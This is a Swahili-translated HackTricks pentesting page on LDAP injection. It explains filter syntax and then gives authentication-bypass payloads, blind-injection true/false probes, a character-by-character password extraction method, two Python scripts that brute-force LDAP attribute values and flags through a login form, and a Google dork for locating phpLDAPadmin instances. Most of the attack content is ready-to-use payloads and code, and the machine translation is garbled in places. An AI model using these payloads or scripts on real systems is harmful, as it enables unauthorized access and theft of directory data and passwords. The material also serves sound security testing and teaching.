9.2 KiB
Kuingiza LDAP
Kuingiza LDAP
Jifunze kuhusu kuingiza AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kuingiza kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Ikiwa una nia ya kazi ya kuingiza na kuingiza yasiyoweza kuingizwa - tunakupa kazi! (inahitajika uwezo wa kuandika na kuzungumza kwa ufasaha wa Kipolishi).
{% embed url="https://www.stmcyber.com/careers" %}
Kuingiza LDAP
LDAP
Ikiwa unataka kujua ni nini LDAP, tembelea ukurasa ufuatao:
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}
Kuingiza LDAP ni shambulio linalolenga programu za wavuti ambazo hujenga taarifa za LDAP kutoka kwa mwingiliano wa mtumiaji. Hutokea wakati programu haifanyi usafi ipasavyo wa mwingiliano, kuruhusu wachomaji wa kudhibiti taarifa za LDAP kupitia mtoa huduma wa ndani, ikisababisha ufikiaji usioruhusiwa au upangaji wa data.
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
Kichujio = ( filtercomp )
Filtercomp = na / au / si / kitu
Na = & filterlist
Au = |filterlist
Si = ! filter
Filterlist = 1*filter
Kitu= rahisi / kujitokeza / kipande
Rahisi = sifa filtertype kuthibitisha thamani
Filtertype = '=' / '~=' / '>=' / '<='
Kujitokeza = sifa = *
Kipande = sifa ”=” [mwanzo] * [mwisho]
Mwanzo = kuthibitisha thamani
Mwisho = kuthibitisha thamani
(&) = Halisi KWELI
(|) = Halisi UONGO
Kwa mfano:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
Unaweza kupata ufikiaji kwenye database, na hii inaweza kuwa na taarifa za aina nyingi tofauti.
OpenLDAP: Ikiwa filamu 2 zinawasili, inatekeleza tu ya kwanza.
ADAM au Microsoft LDS: Pamoja na filamu 2 hutoa kosa.
SunOne Directory Server 5.0: Inatekeleza filamu zote mbili.
Ni muhimu sana kutuma kichujio na muundo sahihi au kosa litatupwa. Ni bora kutuma kichujio kimoja tu.
Kichujio lazima kianze na: &
au |
Mfano: (&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
Kisha: (&(objectClass=
*)(ObjectClass=*))
itakuwa kichujio cha kwanza (kile kinachotekelezwa).
Kupuuza Kuingia
LDAP inasaidia miundo kadhaa ya kuhifadhi nywila: wazi, md5, smd5, sh1, sha, crypt. Kwa hivyo, inaweza kuwa kwamba bila kujali unachoweka ndani ya nywila, inahashishwa.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
Orodha
Kuingiza LDAP ya Kipofu
Unaweza kulazimisha majibu ya Uongo au Kweli kuchunguza kama data yoyote inarudi na kuthibitisha uwezekano wa Kuingiza LDAP ya Kipofu:
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Poteza data
Unaweza kurudia herufi za ascii, tarakimu na alama:
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
Scripts
Gundua mashamba sahihi ya LDAP
Vitu vya LDAP vina sifa kadhaa kwa chaguo-msingi ambazo zinaweza kutumika kutunza habari. Unaweza kujaribu kufanya nguvu zote kuzitoa habari hizo. Unaweza kupata orodha ya sifa za LDAP za chaguo-msingi hapa.
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
Mbinu Maalum ya Kuingiza LDAP kwa Kipofu (bila "*")
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
Google Dorks
Google Dorks
intitle:"phpLDAPadmin" inurl:cmd.php
Payloads Zaidi
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
Ikiwa una nia katika kazi ya udukuzi na kudukua vitu visivyoweza kudukuliwa - tunakupa kazi! (ujuzi wa Kipolishi wa kuandika na kusema unahitajika).
{% embed url="https://www.stmcyber.com/careers" %}
Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.